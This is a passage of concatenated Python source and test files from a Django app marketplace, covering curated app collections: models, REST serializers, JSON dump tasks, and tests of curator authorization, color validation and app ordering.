            # Append: one past the current maximum order (0 when empty).
            aggregate = qs.aggregate(models.Max('order'))['order__max']
            order = aggregate + 1 if aggregate is not None else 0
        rval = CollectionMembership.objects.create(collection=self, app=app,
                                                   order=order)
        # Help django-cache-machine: it doesn't like many 2 many relations,
        # the cache is never invalidated properly when adding a new object.
        CollectionMembership.objects.invalidate(*qs)
        # Keep the app's search index in sync with its collections.
        index_webapps.delay([app.pk])
        return rval

    def remove_app(self, app):
        """
        Remove the passed app from this collection, returning a boolean
        indicating whether a successful deletion took place.
        """
        try:
            membership = self.collectionmembership_set.get(app=app)
        except CollectionMembership.DoesNotExist:
            return False
        else:
            membership.delete()
            index_webapps.delay([app.pk])
            return True

    def reorder(self, new_order):
        """
        Passed a list of app IDs, e.g.

        [18, 24, 9]

        will change the order of each item in the collection to match the
        passed order. A ValueError will be raised if each app in the
        collection is not included in the list.
        """
        # no_cache() so the comparison sees the current db state.
        existing_pks = self.apps().no_cache().values_list('pk', flat=True)
        if set(existing_pks) != set(new_order):
            raise ValueError('Not all apps included')
        for order, pk in enumerate(new_order):
            CollectionMembership.objects.get(collection=self,
                                             app_id=pk).update(order=order)
        index_webapps.delay(new_order)

    def has_curator(self, userprofile):
        """
        Returns boolean indicating whether the passed user profile is a
        curator on this collection.

        ID comparison used instead of directly checking objects to ensure
        that UserProfile objects could be passed.
        """
        return userprofile.id in self.curators.values_list('id', flat=True)

    def add_curator(self, userprofile):
        ret = self.curators.add(userprofile)
        # Invalidate cache-machine entries for the m2m relation.
        Collection.objects.invalidate(*self.curators.all())
        return ret

    def remove_curator(self, userprofile):
        ret = self.curators.remove(userprofile)
        # Invalidate cache-machine entries for the m2m relation.
        Collection.objects.invalidate(*self.curators.all())
        return ret

    @property
    def has_image(self):
        # An image exists iff a hash was recorded for it.
        return bool(self.image_hash)
class CollectionMembership(amo.models.ModelBase):
    """Ordered through-model linking a Webapp to a Collection."""
    collection = models.ForeignKey(Collection)
    app = models.ForeignKey(Webapp)
    # Position of the app within the collection (see Collection.reorder()).
    order = models.SmallIntegerField(null=True)

    def __unicode__(self):
        return u'"%s" in "%s"' % (self.app.name, self.collection.name)

    class Meta:
        db_table = 'app_collection_membership'
        unique_together = ('collection', 'app',)
        ordering = ('order',)
def remove_deleted_apps(*args, **kwargs):
    """Signal handler: delete memberships referencing the removed app."""
    deleted_app = kwargs.get('instance')
    memberships = CollectionMembership.objects.filter(app_id=deleted_app.pk)
    memberships.delete()
# Save translations when saving a Collection. dispatch_uid keeps the
# handlers from being connected twice on re-import.
models.signals.pre_save.connect(save_signal, sender=Collection,
                                dispatch_uid='collection_translations')
# Delete collection membership when deleting an app (sender needs to be Addon,
# not Webapp, because that's the real model underneath).
models.signals.post_delete.connect(remove_deleted_apps, sender=Addon,
                                   dispatch_uid='apps_collections_cleanup')
########NEW FILE########
__FILENAME__ = serializers
# -*- coding: utf-8 -*-
import hashlib
import os
import uuid
from rest_framework import serializers
from rest_framework.fields import get_component
from rest_framework.reverse import reverse
from tower import ugettext_lazy as _
from django.conf import settings
from django.core.exceptions import ImproperlyConfigured
from django.core.files.base import File
from django.core.files.storage import default_storage as storage
import amo
import mkt
from addons.models import Category
from mkt.api.fields import (SlugChoiceField, SlugModelChoiceField,
TranslationSerializerField)
from mkt.features.utils import get_feature_profile
from mkt.search.serializers import SimpleESAppSerializer
from mkt.webapps.serializers import SimpleAppSerializer
from mkt.webapps.models import Webapp
from users.models import UserProfile
from .models import Collection
from .constants import COLLECTIONS_TYPE_FEATURED, COLLECTIONS_TYPE_OPERATOR
class CollectionMembershipField(serializers.RelatedField):
    """
    RelatedField subclass that serializes apps in a Collection, taking into
    account feature profile and optionally relying on ElasticSearch to find
    the apps instead of making a DB query.

    Specifically created for use with CollectionSerializer; you probably
    don't want to use this elsewhere.
    """
    # Which app serializer to use, keyed by the data source.
    app_serializer_classes = {
        'es': SimpleESAppSerializer,
        'normal': SimpleAppSerializer,
    }

    def to_native(self, qs, use_es=False):
        if use_es:
            serializer_class = self.app_serializer_classes['es']
        else:
            serializer_class = self.app_serializer_classes['normal']
        # To work around elasticsearch default limit of 10, hardcode a higher
        # limit.
        return serializer_class(qs[:100], context=self.context, many=True).data

    def _get_device(self, request):
        # Fireplace sends `dev` and `device`. See the API docs. When
        # `dev` is 'android' we also need to check `device` to pick a device
        # object.
        dev = request.GET.get('dev')
        device = request.GET.get('device')
        if dev == 'android' and device:
            dev = '%s-%s' % (dev, device)
        return amo.DEVICE_LOOKUP.get(dev)

    def field_to_native(self, obj, field_name):
        if not hasattr(self, 'context') or not 'request' in self.context:
            raise ImproperlyConfigured('Pass request in self.context when'
                                       ' using CollectionMembershipField.')
        request = self.context['request']
        # Having 'use-es-for-apps' in the context means the parent view wants
        # us to use ES to fetch the apps. If that key is present, check that we
        # have a view in the context and that the waffle flag is active. If
        # everything checks out, bypass the db and use ES to fetch apps for a
        # nice performance boost.
        if self.context.get('use-es-for-apps') and self.context.get('view'):
            return self.field_to_native_es(obj, request)
        qs = get_component(obj, self.source)
        # Filter apps based on device and feature profiles.
        device = self._get_device(request)
        profile = get_feature_profile(request)
        if device and device != amo.DEVICE_DESKTOP:
            qs = qs.filter(addondevicetype__device_type=device.id)
        if profile:
            qs = qs.filter(**profile.to_kwargs(
                prefix='_current_version__features__has_'))
        return self.to_native(qs)

    def field_to_native_es(self, obj, request):
        """
        A version of field_to_native that uses ElasticSearch to fetch the apps
        belonging to the collection instead of SQL.

        Relies on a FeaturedSearchView instance in self.context['view']
        to properly rehydrate results returned by ES.
        """
        profile = get_feature_profile(request)
        region = self.context['view'].get_region_from_request(request)
        device = self._get_device(request)
        _rget = lambda d: getattr(request, d, False)
        qs = Webapp.from_search(request, region=region, gaia=_rget('GAIA'),
                                mobile=_rget('MOBILE'), tablet=_rget('TABLET'))
        filters = {'collection.id': obj.pk}
        if device and device != amo.DEVICE_DESKTOP:
            filters['device'] = device.id
        if profile:
            filters.update(**profile.to_kwargs(prefix='features.has_'))
        # Order by the app's position within this collection; the nested
        # filter restricts the sort to this collection's memberships.
        qs = qs.filter(**filters).order_by({
            'collection.order': {
                'order': 'asc',
                'nested_filter': {
                    'term': {'collection.id': obj.pk}
                }
            }
        })
        return self.to_native(qs, use_es=True)
class CollectionImageField(serializers.HyperlinkedRelatedField):
    """Serializes a collection's image as an absolute CDN URL, or None."""
    read_only = True

    def get_url(self, obj, view_name, request, format):
        if not obj.has_image:
            return None
        url = reverse(view_name, kwargs={'pk': obj.pk}, request=request,
                      format=format)
        # Always prefix with STATIC_URL so images come from our CDN, and
        # append the image hash so far-future expires headers are safe.
        cdn_prefix = settings.STATIC_URL.strip('/')
        return '%s%s?%s' % (cdn_prefix, url, obj.image_hash)
class CollectionSerializer(serializers.ModelSerializer):
    """Full (de)serialization of Collection objects for the API."""
    name = TranslationSerializerField(min_length=1)
    description = TranslationSerializerField()
    slug = serializers.CharField(required=False)
    collection_type = serializers.IntegerField()
    apps = CollectionMembershipField(many=True, source='apps')
    image = CollectionImageField(
        source='*',
        view_name='collection-image-detail',
        format='png')
    # Carrier/region are exposed as slugs but stored as ids.
    carrier = SlugChoiceField(required=False, empty=None,
                              choices_dict=mkt.carriers.CARRIER_MAP)
    region = SlugChoiceField(required=False, empty=None,
                             choices_dict=mkt.regions.REGION_LOOKUP)
    category = SlugModelChoiceField(required=False,
        queryset=Category.objects.filter(type=amo.ADDON_WEBAPP))

    class Meta:
        fields = ('apps', 'author', 'background_color', 'can_be_hero',
                  'carrier', 'category', 'collection_type', 'default_language',
                  'description', 'id', 'image', 'is_public', 'name', 'region',
                  'slug', 'text_color',)
        model = Collection

    def to_native(self, obj):
        """
        Remove `can_be_hero` from the serialization if this is not an operator
        shelf.
        """
        native = super(CollectionSerializer, self).to_native(obj)
        if native['collection_type'] != COLLECTIONS_TYPE_OPERATOR:
            del native['can_be_hero']
        return native

    def validate(self, attrs):
        """
        Prevent operator shelves from being associated with a category.
        """
        existing = getattr(self, 'object')
        exc = 'Operator shelves may not be associated with a category.'
        # On creation, check the incoming data alone; on edit, fall back to
        # the existing values for any field absent from the incoming data.
        if (not existing and attrs['collection_type'] ==
            COLLECTIONS_TYPE_OPERATOR and attrs.get('category')):
            raise serializers.ValidationError(exc)
        elif existing:
            collection_type = attrs.get('collection_type',
                                        existing.collection_type)
            category = attrs.get('category', existing.category)
            if collection_type == COLLECTIONS_TYPE_OPERATOR and category:
                raise serializers.ValidationError(exc)
        return attrs

    def full_clean(self, instance):
        instance = super(CollectionSerializer, self).full_clean(instance)
        if not instance:
            return None
        # For featured apps and operator shelf collections, we need to check
        # if one already exists for the same region/category/carrier
        # combination.
        #
        # Sadly, this can't be expressed as a db-level unique constraint,
        # because this doesn't apply to basic collections.
        #
        # We have to do it ourselves, and we need the rest of the validation
        # to have already taken place, and have the incoming data and original
        # data from existing instance if it's an edit, so full_clean() is the
        # best place to do it.
        unique_collections_types = (COLLECTIONS_TYPE_FEATURED,
                                    COLLECTIONS_TYPE_OPERATOR)
        qs = Collection.objects.filter(
            collection_type=instance.collection_type,
            category=instance.category,
            region=instance.region,
            carrier=instance.carrier)
        if instance.pk:
            qs = qs.exclude(pk=instance.pk)
        if (instance.collection_type in unique_collections_types and
            qs.exists()):
            self._errors['collection_uniqueness'] = _(
                u'You can not have more than one Featured Apps/Operator Shelf '
                u'collection for the same category/carrier/region combination.'
            )
        return instance
class CuratorSerializer(serializers.ModelSerializer):
    """Serializes a curator (UserProfile) down to its public fields."""
    class Meta:
        fields = ('display_name', 'email', 'id')
        model = UserProfile
class DataURLImageField(serializers.CharField):
    """
    Accepts a base64-encoded `data:` URI, stores the decoded payload in a
    temp file and returns an (ImageField value, 8-char md5 hash) tuple.
    """
    def from_native(self, data):
        if not data.startswith('data:'):
            raise serializers.ValidationError('Not a data URI.')
        try:
            metadata, encoded = data.rsplit(',', 1)
        except ValueError:
            # No comma at all: there is no payload to decode. Previously
            # this bubbled up as a bare ValueError (-> HTTP 500).
            raise serializers.ValidationError('Not a data URI.')
        parts = metadata.rsplit(';', 1)
        if parts[-1] != 'base64':
            raise serializers.ValidationError('Not a base64 data URI.')
        import binascii
        try:
            content = encoded.decode('base64')
        except (binascii.Error, ValueError):
            # Malformed base64 must surface as a validation error too.
            raise serializers.ValidationError('Not a base64 data URI.')
        # Write the decoded bytes to a unique temp location, then hand a
        # File wrapper to ImageField for the actual image validation.
        tmp_dst = os.path.join(settings.TMP_PATH, 'icon', uuid.uuid4().hex)
        with storage.open(tmp_dst, 'wb') as f:
            f.write(content)
        tmp = File(storage.open(tmp_dst))
        # Short content hash, used for cache-busting image URLs.
        hash_ = hashlib.md5(content).hexdigest()[:8]
        return serializers.ImageField().from_native(tmp), hash_

    def to_native(self, value):
        return value.name
########NEW FILE########
__FILENAME__ = tasks
import json
import logging
import os
from django.conf import settings
from django.contrib.auth.models import AnonymousUser
from celeryutils import task
from rest_framework import serializers
from test_utils import RequestFactory
from amo.utils import chunked, JSONEncoder
from mkt.collections.models import Collection
from mkt.collections.serializers import CollectionSerializer
from mkt.constants.regions import RESTOFWORLD
from mkt.webapps.models import Webapp
task_log = logging.getLogger('collections.tasks')
class ShortAppSerializer(serializers.ModelSerializer):
    """Minimal app serialization for dumps: the pk plus the path to the
    app's own dumped JSON file."""
    pk = serializers.IntegerField()
    filepath = serializers.SerializerMethodField('get_filepath')

    class Meta:
        model = Webapp
        fields = ('pk', 'filepath')

    def get_filepath(self, obj):
        # Path relative to the dump root, e.g. 'apps/1/1234.json'.
        return os.path.join('apps', object_path(obj))
class ShortAppsCollectionSerializer(CollectionSerializer):
    """CollectionSerializer variant whose apps are pk/filepath stubs."""
    apps = ShortAppSerializer(many=True, read_only=True, source='apps')
def object_path(obj):
    """Return the dump path for *obj*, bucketed by thousands of pks.

    e.g. pk 1234 -> '1/1234.json'. Floor division keeps the bucket an
    integer on both Python 2 and 3; plain `/` would produce a float
    bucket like '1.234' under Python 3.
    """
    bucket = str(obj.pk // 1000)
    return os.path.join(bucket, '{pk}.json'.format(pk=obj.pk))
def collection_filepath(collection):
    """Absolute path of the dumped JSON file for *collection*."""
    relative = object_path(collection)
    return os.path.join(settings.DUMPED_APPS_PATH, 'collections', relative)
def collection_data(collection):
    """Serialize *collection* for dumping.

    Uses a fake anonymous GET request pinned to the RESTOFWORLD region so
    the serialization does not depend on any real incoming request.
    """
    fake_request = RequestFactory().get('/')
    fake_request.user = AnonymousUser()
    fake_request.REGION = RESTOFWORLD
    serializer = ShortAppsCollectionSerializer(
        collection, context={'request': fake_request})
    return serializer.data
def write_file(filepath, output):
    """Write *output* to *filepath*, creating parent directories as
    needed, and return *filepath*.
    """
    import errno
    target_path = os.path.dirname(filepath)
    if not os.path.exists(target_path):
        try:
            os.makedirs(target_path)
        except OSError as exc:
            # Another process may have created the directory between the
            # exists() check and makedirs(); only real failures propagate.
            if exc.errno != errno.EEXIST:
                raise
    with open(filepath, 'w') as f:
        f.write(output)
    return filepath
def dump_collection(collection):
    """Serialize *collection* to its JSON dump file; return the path."""
    target_file = collection_filepath(collection)
    task_log.info('Dumping collection {0} to {1}'.format(collection.pk,
                                                         target_file))
    payload = json.dumps(collection_data(collection), cls=JSONEncoder)
    return write_file(target_file, payload)
@task(ignore_result=False)
def dump_collections(pks):
    """Celery task: dump the public collections in *pks*; return paths."""
    qs = Collection.public.filter(pk__in=pks)
    return [dump_collection(collection) for collection in qs.iterator()]
def dump_all_collections_tasks():
    """Return dump_collections subtasks covering every public collection,
    chunked 100 pks at a time."""
    pks = Collection.public.values_list('pk', flat=True).order_by('pk')
    return [dump_collections.si(chunk) for chunk in chunked(pks, 100)]
########NEW FILE########
__FILENAME__ = test_authorization
import json
from urllib import urlencode
from nose.tools import ok_
from rest_framework.generics import GenericAPIView
from rest_framework.request import Request
from rest_framework.settings import api_settings
from access.middleware import ACLMiddleware
from amo.tests import TestCase
from users.models import UserProfile
from mkt.collections.authorization import (CanBeHeroAuthorization,
CuratorAuthorization,
StrictCuratorAuthorization)
from mkt.collections.tests import CollectionTestMixin
from mkt.site.fixtures import fixture
from test_utils import RequestFactory
class TestCuratorAuthorization(CollectionTestMixin, TestCase):
    """Permission matrix for CuratorAuthorization.

    Expected behavior exercised below: GET is always allowed; unsafe verbs
    require the 'Collections:Curate' permission, or (at object level, for
    everything except DELETE) being a curator of the collection.
    """
    auth_class = CuratorAuthorization
    fixtures = fixture('user_2519')
    def setUp(self):
        super(TestCuratorAuthorization, self).setUp()
        self.collection = self.make_collection()
        self.auth = self.auth_class()
        self.user = UserProfile.objects.get(pk=2519)
        self.profile = self.user
        self.view = GenericAPIView()
    def give_permission(self):
        # Grant the site-wide curation permission to the test user.
        self.grant_permission(self.profile, 'Collections:Curate')
    def make_curator(self):
        # Make the test user a curator of self.collection.
        self.collection.add_curator(self.profile)
    def request(self, verb):
        # Build a bare request for `verb` with ACL groups resolved.
        request = getattr(RequestFactory(), verb.lower())('/')
        request.user = self.user
        ACLMiddleware().process_request(request)
        return request
    def is_authorized(self, request):
        # List-level (non-object) permission check.
        return self.auth.has_permission(request, self.view)
    def is_authorized_object(self, request):
        # Object-level permission check against self.collection.
        return self.auth.has_object_permission(request, self.view,
                                               self.collection)
    def test_get_list(self):
        ok_(self.is_authorized(self.request('GET')))
    def test_get_list_permission(self):
        self.give_permission()
        ok_(self.is_authorized(self.request('GET')))
    def test_post_list(self):
        ok_(not self.is_authorized(self.request('POST')))
    def test_post_list_permission(self):
        self.give_permission()
        ok_(self.is_authorized(self.request('POST')))
    def test_delete_list(self):
        ok_(not self.is_authorized(self.request('DELETE')))
    def test_delete_list_permission(self):
        self.give_permission()
        ok_(self.is_authorized(self.request('DELETE')))
    def test_get_detail(self):
        ok_(self.is_authorized_object(self.request('GET')))
    def test_get_detail_permission(self):
        self.give_permission()
        ok_(self.is_authorized_object(self.request('GET')))
    def test_get_detail_curator(self):
        self.make_curator()
        ok_(self.is_authorized_object(self.request('GET')))
    def test_get_detail_permission_curator(self):
        self.give_permission()
        self.make_curator()
        ok_(self.is_authorized_object(self.request('GET')))
    def test_post_detail(self):
        ok_(not self.is_authorized_object(self.request('POST')))
    def test_post_detail_permission(self):
        self.give_permission()
        ok_(self.is_authorized_object(self.request('POST')))
    def test_post_detail_curator(self):
        self.make_curator()
        ok_(self.is_authorized_object(self.request('POST')))
    def test_post_detail_permission_curator(self):
        self.give_permission()
        self.make_curator()
        ok_(self.is_authorized_object(self.request('POST')))
    def test_delete_detail(self):
        ok_(not self.is_authorized_object(self.request('DELETE')))
    def test_delete_detail_permission(self):
        self.give_permission()
        ok_(self.is_authorized_object(self.request('DELETE')))
    def test_delete_detail_curator(self):
        # Curators may edit but NOT delete a collection.
        self.make_curator()
        ok_(not self.is_authorized_object(self.request('DELETE')))
    def test_delete_detail_permission_curator(self):
        self.give_permission()
        self.make_curator()
        ok_(self.is_authorized_object(self.request('DELETE')))
class TestStrictCuratorAuthorization(TestCuratorAuthorization):
    """Same matrix as TestCuratorAuthorization, but the strict class also
    denies unauthenticated/unprivileged GET access."""
    auth_class = StrictCuratorAuthorization
    def test_get_list(self):
        ok_(not self.is_authorized(self.request('GET')))
    def test_get_detail(self):
        ok_(not self.is_authorized_object(self.request('GET')))
class TestCanBeHeroAuthorization(CollectionTestMixin, TestCase):
    """CanBeHeroAuthorization: only users with 'Collections:Curate' may
    modify the `can_be_hero` field via POST/PUT; all other requests pass."""
    # Verbs on which the authorization class enforces the field check.
    enforced_verbs = ['POST', 'PUT']
    fixtures = fixture('user_2519')
    def setUp(self):
        super(TestCanBeHeroAuthorization, self).setUp()
        self.collection = self.make_collection()
        self.auth = CanBeHeroAuthorization()
        self.user = UserProfile.objects.get(pk=2519)
        self.profile = self.user
        self.view = GenericAPIView()
    def give_permission(self):
        self.grant_permission(self.profile, 'Collections:Curate')
    def is_authorized_object(self, request):
        return self.auth.has_object_permission(request, self.view,
                                               self.collection)
    def request(self, verb, qs=None, content_type='application/json',
                encoder=json.dumps, **data):
        """Build a DRF Request for `verb`, encoding **data into the body
        with `encoder` and appending `qs` to the URL querystring."""
        if not qs:
            qs = ''
        request = getattr(RequestFactory(), verb.lower())
        request = request('/?' + qs, content_type=content_type,
                          data=encoder(data) if data else '')
        request.user = self.user
        ACLMiddleware().process_request(request)
        # Wrap in a DRF Request so request.DATA parsing works as in views.
        return Request(request, parsers=[parser_cls() for parser_cls in
                                         api_settings.DEFAULT_PARSER_CLASSES])
    def test_unenforced(self):
        """
        Should always pass for GET requests.
        """
        ok_(self.is_authorized_object(self.request('GET')))
    def test_no_qs_modification(self):
        """
        Non-GET requests should not be rejected if there is a can_be_true
        querystring param (which hypothetically shouldn't do anything).
        We're effectively testing that request.GET doesn't bleed into
        request.POST.
        """
        self.give_permission()
        for verb in self.enforced_verbs:
            request = self.request(verb, qs='can_be_hero=1')
            ok_(not self.auth.hero_field_modified(request), verb)
    def test_change_permission(self):
        """
        Should pass if the user is attempting to modify the can_be_hero field
        and has the permission.
        """
        self.give_permission()
        for verb in self.enforced_verbs:
            request = self.request(verb, can_be_hero=True)
            ok_(self.auth.hero_field_modified(request), verb)
    def test_change_permission_urlencode(self):
        """
        Should pass if the user is attempting to modify the can_be_hero field
        and has the permission.
        """
        self.give_permission()
        for verb in self.enforced_verbs:
            request = self.request(verb, encoder=urlencode,
                content_type='application/x-www-form-urlencoded',
                can_be_hero=True)
            ok_(self.auth.hero_field_modified(request), verb)
    def test_no_change_no_permission(self):
        """
        Should pass if the user does not have the permission and is not
        attempting to modify the can_be_hero field.
        """
        for verb in self.enforced_verbs:
            request = self.request(verb)
            ok_(self.is_authorized_object(request), verb)
    def test_no_change(self):
        """
        Should pass if the user does have the permission and is not attempting
        to modify the can_be_hero field.
        """
        self.give_permission()
        for verb in self.enforced_verbs:
            request = self.request(verb)
            ok_(self.is_authorized_object(request), verb)
    def test_post_change_no_permission(self):
        """
        Should not pass if the user is attempting to modify the can_be_hero
        field without the permission.
        """
        for verb in self.enforced_verbs:
            request = self.request(verb, can_be_hero=True)
            ok_(not self.is_authorized_object(request), verb)
########NEW FILE########
__FILENAME__ = test_fields
from django.core import exceptions
import amo.tests
from mkt.collections.fields import ColorField
class TestColorField(amo.tests.TestCase):
    """Validation tests for ColorField ('#RRGGBB' hex color strings)."""
    def setUp(self):
        self.field = ColorField()
    def test_validation_letters_after_f(self):
        # 'G' is not a valid hex digit.
        with self.assertRaises(exceptions.ValidationError):
            self.field.validate('#GGGGGG', None)
    def test_validation_too_short(self):
        # Only five hex digits after the pound sign.
        with self.assertRaises(exceptions.ValidationError):
            self.field.validate('#00000', None)
    def test_validation_no_pound(self):
        # Leading '#' is required.
        with self.assertRaises(exceptions.ValidationError):
            self.field.validate('FF00FF', None)
    def should_pass(self, val):
        """Assert that `val` passes ColorField validation."""
        try:
            self.field.validate(val, None)
        except exceptions.ValidationError:
            # Bug fix: the original message never interpolated `val`, so
            # failures printed a literal "%s" instead of the failing value.
            self.fail('Value "%s" should pass validation.' % val)
    def test_validation_passes(self):
        for value in ['#010101', '#FF00FF', '#FFFFFF']:
            self.should_pass(value)
########NEW FILE########
__FILENAME__ = test_managers
from nose.tools import ok_
import amo.tests
from mkt.collections.constants import COLLECTIONS_TYPE_BASIC
from mkt.collections.models import Collection
class TestPublicCollectionsManager(amo.tests.TestCase):
    """The `Collection.public` manager must expose only public rows."""
    def setUp(self):
        self.public_collection = Collection.objects.create(
            name='Public',
            description='The public one',
            is_public=True,
            collection_type=COLLECTIONS_TYPE_BASIC)
        self.private_collection = Collection.objects.create(
            name='Private',
            description='The private one',
            is_public=False,
            collection_type=COLLECTIONS_TYPE_BASIC)
    def test_public(self):
        public_qs = Collection.public.all()
        ok_(self.public_collection in public_qs)
        ok_(self.private_collection not in public_qs)
########NEW FILE########
__FILENAME__ = test_models
from mock import patch
from nose.tools import eq_
import amo.tests
from mkt.collections.constants import COLLECTIONS_TYPE_FEATURED
from mkt.collections.models import Collection, CollectionMembership
class TestCollection(amo.tests.TestCase):
    """Model-level tests for Collection: app membership (add/remove/reorder),
    ordering bookkeeping in CollectionMembership, and filtering of
    deleted/disabled/non-public apps from Collection.apps()."""
    def setUp(self):
        self.collection_data = {
            'background_color': '#FF00FF',
            'collection_type': COLLECTIONS_TYPE_FEATURED,
            'description': 'A collection of my favourite games',
            'name': 'My Favourite Games',
            'slug': 'my-favourite-games',
            'text_color': '#00FF00',
        }
        self.collection = Collection.objects.create(**self.collection_data)
    def test_save(self):
        # Re-fetching then saving must not raise.
        self.collection = Collection.objects.all()[0]
        self.collection.save()
    @patch('mkt.collections.models.index_webapps.delay')
    def _add_apps(self, mocked_index_webapps):
        # Add all generated apps, checking each add triggers reindexing.
        for app in self.apps:
            self.collection.add_app(app)
            mocked_index_webapps.assert_called_with([app.pk])
    def _generate_apps(self):
        self.apps = [amo.tests.app_factory() for n in xrange(1, 5)]
    def test_collection(self):
        # Every field given at creation round-trips through the model.
        for name, value in self.collection_data.iteritems():
            eq_(self.collection_data[name], getattr(self.collection, name))
    def test_collection_no_colors(self):
        # Colors are optional.
        self.collection_data.pop('background_color')
        self.collection_data.pop('text_color')
        self.collection_data['slug'] = 'favorite-games-2'
        self.collection = Collection.objects.create(**self.collection_data)
        self.test_collection()
    @patch('mkt.collections.models.index_webapps.delay')
    def test_add_app_order_override(self, mocked_index_webapps):
        self._generate_apps()
        added = self.collection.add_app(self.apps[1], order=3)
        mocked_index_webapps.assert_called_with([self.apps[1].pk])
        eq_(added.order, 3)
        eq_(added.app, self.apps[1])
        eq_(added.collection, self.collection)
        added = self.collection.add_app(self.apps[2], order=1)
        mocked_index_webapps.assert_called_with([self.apps[2].pk])
        eq_(added.order, 1)
        eq_(added.app, self.apps[2])
        eq_(added.collection, self.collection)
        # Apps come back sorted by their explicit order.
        eq_(list(self.collection.apps()), [self.apps[2], self.apps[1]])
    def test_apps(self):
        self._generate_apps()
        # First fetch the apps. Depending CACHE_EMPTY_QUERYSETS an empty list
        # will be cached, or not.
        self.assertSetEqual(self.collection.apps(), [])
        eq_(list(CollectionMembership.objects.values_list('order', flat=True)),
            [])
        # Add an app and re-check the apps list. Regardless of whether caching
        # took place in the previous step, we should get a new, up to date apps
        # list.
        self.collection.add_app(self.apps[0])
        self.assertSetEqual(self.collection.apps(), [self.apps[0]])
        eq_(list(CollectionMembership.objects.values_list('order', flat=True)),
            [0])
        # Add an app again. This time we know for sure caching took place in
        # the previous step, and we still want to get the new, up to date apps
        # list.
        self.collection.add_app(self.apps[1])
        self.assertSetEqual(self.collection.apps(),
                            [self.apps[0], self.apps[1]])
        eq_(list(CollectionMembership.objects.values_list('order', flat=True)),
            [0, 1])
        # Add and test the rest of the apps in one go.
        self.collection.add_app(self.apps[2])
        self.collection.add_app(self.apps[3])
        self.assertSetEqual(self.collection.apps(), self.apps)
        eq_(list(CollectionMembership.objects.values_list('order', flat=True)),
            [0, 1, 2, 3])
    def test_remove_apps(self):
        self._generate_apps()
        self._add_apps()
        self.assertSetEqual(self.collection.apps(), self.apps)
        self.collection.remove_app(self.apps[0])
        self.assertSetEqual(self.collection.apps(),
                            [self.apps[1], self.apps[2], self.apps[3]])
        # Remaining orders are NOT renumbered after a removal.
        eq_(list(CollectionMembership.objects.values_list('order', flat=True)),
            [1, 2, 3])
        self.collection.remove_app(self.apps[2])
        self.assertSetEqual(self.collection.apps(),
                            [self.apps[1], self.apps[3]])
        eq_(list(CollectionMembership.objects.values_list('order', flat=True)),
            [1, 3])
    @patch('mkt.collections.models.index_webapps.delay')
    def test_apps_reorder(self, mocked_index_webapps):
        self._generate_apps()
        self._add_apps()
        reordered_pks = [self.apps[3].pk, self.apps[2].pk,
                         self.apps[0].pk, self.apps[1].pk]
        self.collection.reorder(reordered_pks)
        self.assertSetEqual(self.collection.apps().values_list('pk', flat=True),
                            reordered_pks)
        mocked_index_webapps.assert_called_with(reordered_pks)
    def test_app_deleted(self):
        # Deleting an app removes both it and its membership row.
        collection = self.collection
        app = amo.tests.app_factory()
        collection.add_app(app)
        self.assertSetEqual(collection.apps(), [app])
        self.assertSetEqual(collection.collectionmembership_set.all(),
            [CollectionMembership.objects.get(collection=collection, app=app)])
        app.delete()
        self.assertSetEqual(collection.apps(), [])
        self.assertSetEqual(collection.collectionmembership_set.all(), [])
    def test_app_disabled_by_user(self):
        collection = self.collection
        app = amo.tests.app_factory()
        collection.add_app(app)
        self.assertSetEqual(collection.apps(), [app])
        self.assertSetEqual(collection.collectionmembership_set.all(),
            [CollectionMembership.objects.get(collection=collection, app=app)])
        app.update(disabled_by_user=True)
        self.assertSetEqual(collection.apps(), [])
        # The collection membership still exists here, the app is not deleted,
        # only disabled.
        self.assertSetEqual(collection.collectionmembership_set.all(),
            [CollectionMembership.objects.get(collection=collection, app=app)])
    def test_app_pending(self):
        collection = self.collection
        app = amo.tests.app_factory()
        collection.add_app(app)
        self.assertSetEqual(collection.apps(), [app])
        self.assertSetEqual(collection.collectionmembership_set.all(),
            [CollectionMembership.objects.get(collection=collection, app=app)])
        app.update(status=amo.STATUS_PENDING)
        self.assertSetEqual(collection.apps(), [])
        # The collection membership still exists here, the app is not deleted,
        # just not public.
        self.assertSetEqual(collection.collectionmembership_set.all(),
            [CollectionMembership.objects.get(collection=collection, app=app)])
    def test_mixed_ordering(self):
        # Later adds continue numbering after the highest explicit order.
        self._generate_apps()
        extra_app = amo.tests.app_factory()
        added = self.collection.add_app(extra_app, order=3)
        eq_(added.order, 3)
        self.assertSetEqual(self.collection.apps(), [extra_app])
        self._add_apps()
        eq_(list(CollectionMembership.objects.values_list('order', flat=True)),
            [3, 4, 5, 6, 7])
########NEW FILE########
__FILENAME__ = test_serializers
# -*- coding: utf-8 -*-
import hashlib
import json
from django.test.utils import override_settings
from nose.tools import eq_, ok_
from rest_framework import serializers
from test_utils import RequestFactory
import amo
import amo.tests
from addons.models import AddonUser, Category
from users.models import UserProfile
import mkt
from mkt.collections.constants import (COLLECTIONS_TYPE_BASIC,
COLLECTIONS_TYPE_OPERATOR)
from mkt.collections.models import Collection, CollectionMembership
from mkt.collections.serializers import (CollectionMembershipField,
CollectionSerializer,
DataURLImageField)
from mkt.constants.features import FeatureProfile
from mkt.search.views import FeaturedSearchView
from mkt.site.fixtures import fixture
from mkt.webapps.serializers import SimpleAppSerializer
class CollectionDataMixin(object):
    """Provides baseline creation kwargs (with translated name/description)
    for test collections."""
    collection_data = {
        'collection_type': COLLECTIONS_TYPE_BASIC,
        'name': {'en-US': u'A collection of my favourite gàmes'},
        'slug': 'my-favourite-games',
        'description': {'en-US': u'A collection of my favourite gamés'},
    }
class BaseTestCollectionMembershipField(object):
    """Shared tests for CollectionMembershipField serialization: ordering,
    filtering of deleted/disabled/pending apps, and feature-profile /
    device filtering. Subclasses supply the TestCase base (DB or ES)."""
    def setUp(self):
        self.collection = Collection.objects.create(**self.collection_data)
        self.app = amo.tests.app_factory()
        self.app.addondevicetype_set.get_or_create(
            device_type=amo.DEVICE_GAIA.id)
        self.collection.add_app(self.app, order=1)
        self.field = CollectionMembershipField()
        self.field.context = {}
        self.membership = CollectionMembership.objects.all()[0]
        # Signature of a feature profile with every app feature enabled.
        self.profile = FeatureProfile(apps=True).to_signature()
    def get_request(self, data=None):
        # Build an API GET request in the RESTOFWORLD region.
        if data is None:
            data = {}
        request = RequestFactory().get('/', data)
        request.REGION = mkt.regions.RESTOFWORLD
        request.API = True
        return request
    def test_to_native(self):
        self.app2 = amo.tests.app_factory()
        self.collection.add_app(self.app2)
        apps = [self.app, self.app2]
        request = self.get_request({})
        resource = SimpleAppSerializer(apps)
        resource.context = {'request': request}
        self.field.context['request'] = request
        data = self.field.to_native(self.collection.apps())
        eq_(len(data), 2)
